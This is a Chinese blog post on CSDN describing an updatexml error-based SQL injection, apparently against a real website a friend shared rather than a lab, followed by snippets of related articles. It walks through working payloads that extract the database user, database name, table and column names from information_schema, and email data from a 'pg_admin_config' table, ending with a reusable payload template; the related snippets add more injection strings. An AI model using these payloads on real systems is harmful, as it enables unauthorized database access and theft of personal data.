记一次简单的 updatexml报错注入

最新推荐文章于 2024-06-05 09:47:09 发布
最新推荐文章于 2024-06-05 09:47:09 发布
阅读量2.1k 收藏 6
点赞数 1
分类专栏: web安全 文章标签: mysql报错注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ws13129/article/details/88778557
版权

朋友发的,问怎么注入
在这里插入图片描述
有大佬发了,报错注入。那就来锤他
UPDATEXML (XML_document, XPath_string, new_value);
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。
第三个参数:new_value,String格式,替换查找到的符合条件的数据
mysql CONCAT()函数用于将多个字符串连接成一个字符串

查询用户updatexml(1,concat(0x7e,(select user()) ,0x7e),1)–+


查询数据库名称updatexml(1,concat(0x7e,(select database()) ,0x7e),1)–+

在这里插入图片描述
查表 updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=库的16进制 limit 0,1) ,0x7e),1)–+

在这里插入图片描述

查列名updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=库的16进制 and table_name= 0x70675F61646D696E5F636F6E666967 limit 2,1),0x7e),1)–+

在这里插入图片描述
查询具体数据updatexml(1,concat(0x7e,(select email from pg_admin_config limit 0,1),0x7e),1)–+
在这里插入图片描述

总结,简单无干扰的报错注入
updatexml(1,concat(0x7e,(普通注入语句),0x7e),1)–+基本就能注出数据了
写的很low,拒绝反驳

cxk331
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql xml函数_MYSQL updatexml()函数注入解析
weixin_42188533的博客
02-27 1132
MYSQL updatexml()函数注入解析首先了解下updatexml()函数UPDATEXML (XML_document, XPath_string, new_value);第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。第三个参...
sql注入总结
kallaa的博客
07-14 589
1:字符:http://localhost/sql/Less-1/index.php?id=2' or '1=1   //2' or '1'='1 2:数字:http://localhost/sql/Less-2/index.php?id=2 or 1=1 爆表名:  (1)http://localhost/sql/Less-2/index.php?id=1+and(sele
SQL注入----注入简介(updatexml
一只web狗
06-21 3377
注入updatexml)常用语句
SQL注入updatexml注入(函数解释)
最新发布
m0_74608722的博客
06-05 439
第二个参数 xml路径 是可操作的地方,xml文档中路径是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会,并且会返回我们写入的非法格式内容,而这个非法的内容就是我们想要查询的内容。原因:是因为updatexml(1,database(),1)这种书写的语法格式是正确的,所以不会爆出语法误,在SQL注入中无法得到想要的库、表、列名(为了得到他们,应该怎样书写呐?正常查询 第二个参数的格式为 /xxx/xx/xx/xx ,即使查询不到也不会
一次sql挖掘实战(注入
weixin_51646864的博客
04-22 3752
学习完注入手法后刚巧在挖洞时就遇到了一个注入漏洞,特此录一下 2、抓到的数据包如下:然后送到重发器 3、尝试在mobile参数后加单引号“ ' ”,点击发送数据包 4、看到返回包中提示sql语句查询出,所以这里存在sql注入 5、由于没有回显位,所以使用注入。 构造语句:1' and updatexml(1,concat(0x7e,(database()),0x7e),1)# 6、点击发送数据包后,可以在响应包中看到爆出数据库名 .
sqli-labs笔
weixin_64183637的博客
08-02 262
sqli-labs闯关
mysql 注入 xml_MYSQL updatexml()函数注入解析
weixin_36181866的博客
01-19 131
首先了解下updatexml()函数UPDATEXML (XML_document, XPath_string, new_value);第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。第三个参数:new_value,String格式,替换查找...
MYSQL updatexml()函数注入解析
09-09
MySQL的`updatexml()`函数是一个用于更新XML文档中特定节点值的函数,它允许在数据库中的XML字段上执行动态查询。这个函数在处理XML数据时非常有用,但同时也可能成为安全漏洞的来源,特别是在没有正确过滤用户输入...
7. updatexml()注入 示例1
08-03
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 第二个参数:XPath_string (Xpath格式的字符串)
web-注入-皮卡丘靶场
07-15
注入】是一种安全漏洞,它发生在Web应用程序中,当用户输入的数据被误地用于构造数据库查询时,导致数据库返回误信息。这些误信息可能包含敏感数据,从而让攻击者能够获取未授权的信息或者控制数据库。...
SQL注入 updatexml与extractvalue函数介绍)-01
09-15
SQL注入updatexml与extractvalue函数介绍) SQL注入是一种常见的Web应用安全漏洞,它是指攻击者通过在Web应用的输入中inject恶意的SQL代码,来获取或修改数据库中的数据。今天,我们将讨论SQL注入的两种...
updatexml函数-注入原理学习
热门推荐
身高两米不到的博客
03-17 1万+
注入之前,首先得明白updatexml函数的利用方式以及函数语法。 updatexml(xml_doument,XPath_string,new_value) 第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。 第三个参数:new_value,String格式,替换查找到的符合条件的数据 以上是网上搜索的含义,看到以上内容,我不知道是不是有人和
updatexml mysql_MYSQL updatexml注入
weixin_42311000的博客
01-19 1021
updatexml()函数updataxml()函数用法UPDATEXML (XML_document, XPath_string, new_value);第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。第三个参数:new_value,Str...
【SQL注入-updatexml注入
weixin_52613207的博客
06-11 419
同extractvalue(),输入误的第二个参数,即更改路径符号。参数3:string格式,替换查找到的符合条件的数据。函数updatexml(参数1,参数2,参数3)参数1:string格式,为XML文档对象的名称。
sqli-labs-注入-updatexml
weixin_51706044的博客
03-14 1292
文章目录前言一、updatexml二、updatexml忆 前言 union注入是最简单方便的,但是要求页面必须有显示位,没有就没法利用. 所以当页面没有显示位时,我们需要用其他方法来获取数据.因此我们可以使用注入: 有些网站在开发调试阶段开启了提示信息,如果没有关闭,就有可能存在注入. 注入函数: floor函数 extractvalue updatexml 今天我在这里先录一下对于updatexml函数的学习 一、updatexml 基本格式: ?id=
一道综合渗透题引发的updatexml()注入思考
Grey的博客
05-09 1万+
MYSQL数据库updatexml注入UPDATEXML (XML_document, XPath_string, new_value); 第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。 第三个参数:new_value,String格...
com.sun.org.apache.xml.internal.security.utils does not exist问题的解决
日光之下的博客
03-06 9063
方法一:网上大神的回答:自己写的程序是不建议用com.sun这个玩意儿的。。这东西属于“Deprecated and restricted API”。。而且各种com.sun的包现在都有替代品。。  如果是公司的老项目非用不可,可以用eclipse导入maven,properties-> Java Compiler -> Errors/Warnings -> Deprecated...
SQL注入方法-注入
acepanhuan的博客
02-11 995
SQL注入方法-注入
解决Spring Boot项目多模块化时,child module ....pom.xml does not exist问题
lililuni的博客
10-17 2934
问题:     在对父项目执行 maven clean 时这个,我的误原因是下图三个子项目名称后面的文件名没与 父项目的pom.xml中的Modules对应。 <modules> <module>common</module> <module>server</module> ...
updatexml注入
05-31
"updatexml" 是一种用于更新 XML 数据的 SQL 函数,但是如果应用程序没有正确验证用户输入的数据,攻击者就可以通过构造恶意的输入数据来进行 SQL 注入攻击,从而导致 "updatexml" 。 为了防止 SQL 注入攻击,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值